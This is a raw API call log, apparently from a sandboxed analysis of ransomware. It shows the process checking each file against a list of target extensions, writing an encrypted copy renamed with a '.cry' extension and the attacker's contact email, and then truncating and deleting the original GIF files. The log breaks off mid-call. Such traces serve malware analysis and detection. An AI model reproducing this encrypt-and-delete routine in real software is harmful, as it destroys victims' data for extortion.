[0051.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0051.031] lstrlenW (lpString=".doc") returned 4 [0051.031] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.031] lstrlenW (lpString=".docx") returned 5 [0051.031] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.031] lstrlenW (lpString=".pdf") returned 4 [0051.031] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.031] lstrlenW (lpString=".xls") returned 4 [0051.031] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.031] lstrlenW (lpString=".xlsx") returned 5 [0051.031] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.031] lstrlenW (lpString=".ppt") returned 4 [0051.031] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0051.031] lstrlenW (lpString=".zip") returned 4 [0051.031] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.031] lstrlenW (lpString=".rar") returned 4 [0051.031] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.031] lstrlenW (lpString=".bz2") returned 4 [0051.031] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.031] lstrlenW (lpString=".7z") returned 3 [0051.031] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0051.031] lstrlenW (lpString=".dbf") returned 4 [0051.031] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0051.031] lstrlenW (lpString=".1cd") returned 4 [0051.031] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0051.031] lstrlenW (lpString=".jpg") returned 4 [0051.031] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.032] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=3484) returned 1 [0051.032] CloseHandle (hObject=0x1bc) returned 1 [0051.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 0x20 [0051.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.032] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.032] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.032] GetLastError () returned 0x0 [0051.032] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xd9c, lpOverlapped=0x0) returned 1 [0051.119] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xda0, lpOverlapped=0x0) returned 1 [0051.120] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.120] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.120] SetEndOfFile (hFile=0x22c) returned 1 [0051.120] CloseHandle (hObject=0x22c) returned 1 [0051.120] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.120] SetEndOfFile (hFile=0x1bc) returned 1 [0051.121] CloseHandle (hObject=0x1bc) returned 1 [0051.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0051.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0051.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0051.122] lstrlenW (lpString=".doc") returned 4 [0051.122] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.122] lstrlenW (lpString=".docx") returned 5 [0051.122] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.122] lstrlenW (lpString=".pdf") returned 4 [0051.122] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.122] lstrlenW (lpString=".xls") returned 4 [0051.122] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.122] lstrlenW (lpString=".xlsx") returned 5 [0051.122] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.122] lstrlenW (lpString=".ppt") returned 4 [0051.122] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0051.122] lstrlenW (lpString=".zip") returned 4 [0051.122] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.122] lstrlenW (lpString=".rar") returned 4 [0051.122] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.122] lstrlenW (lpString=".bz2") returned 4 [0051.122] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.122] lstrlenW (lpString=".7z") returned 3 [0051.122] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0051.122] lstrlenW (lpString=".dbf") returned 4 [0051.122] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0051.122] lstrlenW (lpString=".1cd") returned 4 [0051.123] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0051.123] lstrlenW (lpString=".jpg") returned 4 [0051.123] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.123] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=12482) returned 1 [0051.123] CloseHandle (hObject=0x1bc) returned 1 [0051.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 0x20 [0051.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.123] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.124] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.124] GetLastError () returned 0x0 [0051.124] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x30c2, lpOverlapped=0x0) returned 1 [0051.165] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0051.166] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.166] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.166] SetEndOfFile (hFile=0x22c) returned 1 [0051.166] CloseHandle (hObject=0x22c) returned 1 [0051.166] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.166] SetEndOfFile (hFile=0x1bc) returned 1 [0051.167] CloseHandle (hObject=0x1bc) returned 1 [0051.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.167] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0051.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0051.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0051.167] lstrlenW (lpString=".doc") returned 4 [0051.167] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.168] lstrlenW (lpString=".docx") returned 5 [0051.168] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.168] lstrlenW (lpString=".pdf") returned 4 [0051.168] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.168] lstrlenW (lpString=".xls") returned 4 [0051.168] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.168] lstrlenW (lpString=".xlsx") returned 5 [0051.168] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.168] lstrlenW (lpString=".ppt") returned 4 [0051.168] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0051.168] lstrlenW (lpString=".zip") returned 4 [0051.168] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.168] lstrlenW (lpString=".rar") returned 4 [0051.168] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.168] lstrlenW (lpString=".bz2") returned 4 [0051.168] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.168] lstrlenW (lpString=".7z") returned 3 [0051.168] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0051.168] lstrlenW (lpString=".dbf") returned 4 [0051.168] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0051.168] lstrlenW (lpString=".1cd") returned 4 [0051.168] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0051.168] lstrlenW (lpString=".jpg") returned 4 [0051.168] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.168] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=5253) returned 1 [0051.168] CloseHandle (hObject=0x1bc) returned 1 [0051.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 0x20 [0051.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.169] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.169] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.169] GetLastError () returned 0x0 [0051.169] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x1485, lpOverlapped=0x0) returned 1 [0051.210] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1490, lpOverlapped=0x0) returned 1 [0051.212] ReadFile (in: hFile=0x1bc, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.212] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.212] SetEndOfFile (hFile=0x22c) returned 1 [0051.212] CloseHandle (hObject=0x22c) returned 1 [0051.213] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.213] SetEndOfFile (hFile=0x1bc) returned 1 [0051.213] CloseHandle (hObject=0x1bc) returned 1 [0051.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0051.214] lstrlenW (lpString=".doc") returned 4 [0051.214] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.214] lstrlenW (lpString=".docx") returned 5 [0051.214] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.214] lstrlenW (lpString=".pdf") returned 4 [0051.214] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.214] lstrlenW (lpString=".xls") returned 4 [0051.214] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.214] lstrlenW (lpString=".xlsx") returned 5 [0051.214] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.214] lstrlenW (lpString=".ppt") returned 4 [0051.214] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0051.214] lstrlenW (lpString=".zip") returned 4 [0051.214] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.214] lstrlenW (lpString=".rar") returned 4 [0051.214] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.214] lstrlenW (lpString=".bz2") returned 4 [0051.214] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.214] lstrlenW (lpString=".7z") returned 3 [0051.214] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0051.214] lstrlenW (lpString=".dbf") returned 4 [0051.214] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0051.214] lstrlenW (lpString=".1cd") returned 4 [0051.214] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0051.215] lstrlenW (lpString=".jpg") returned 4 [0051.215] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.259] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.259] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.260] GetLastError () returned 0x0 [0051.260] ReadFile (in: hFile=0x1f0, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xa24, lpOverlapped=0x0) returned 1 [0051.270] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xa30, lpOverlapped=0x0) returned 1 [0051.271] ReadFile (in: hFile=0x1f0, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.271] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.271] SetEndOfFile (hFile=0x1bc) returned 1 [0051.271] CloseHandle (hObject=0x1bc) returned 1 [0051.271] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.271] SetEndOfFile (hFile=0x1f0) returned 1 [0051.272] CloseHandle (hObject=0x1f0) returned 1 [0051.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0051.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0051.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0051.273] lstrlenW (lpString=".doc") returned 4 [0051.273] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.273] lstrlenW (lpString=".docx") returned 5 [0051.273] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.273] lstrlenW (lpString=".pdf") returned 4 [0051.273] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.273] lstrlenW (lpString=".xls") returned 4 [0051.273] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.273] lstrlenW (lpString=".xlsx") returned 5 [0051.273] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.273] lstrlenW (lpString=".ppt") returned 4 [0051.273] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0051.273] lstrlenW (lpString=".zip") returned 4 [0051.273] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.273] lstrlenW (lpString=".rar") returned 4 [0051.275] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.275] lstrlenW (lpString=".bz2") returned 4 [0051.275] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.275] lstrlenW (lpString=".7z") returned 3 [0051.275] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0051.275] lstrlenW (lpString=".dbf") returned 4 [0051.275] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0051.275] lstrlenW (lpString=".1cd") returned 4 [0051.275] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0051.275] lstrlenW (lpString=".jpg") returned 4 [0051.275] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.275] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=5315) returned 1 [0051.275] CloseHandle (hObject=0x1f0) returned 1 [0051.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 0x20 [0051.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.283] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.283] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.284] GetLastError () returned 0x0 [0051.284] ReadFile (in: hFile=0x1f0, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: 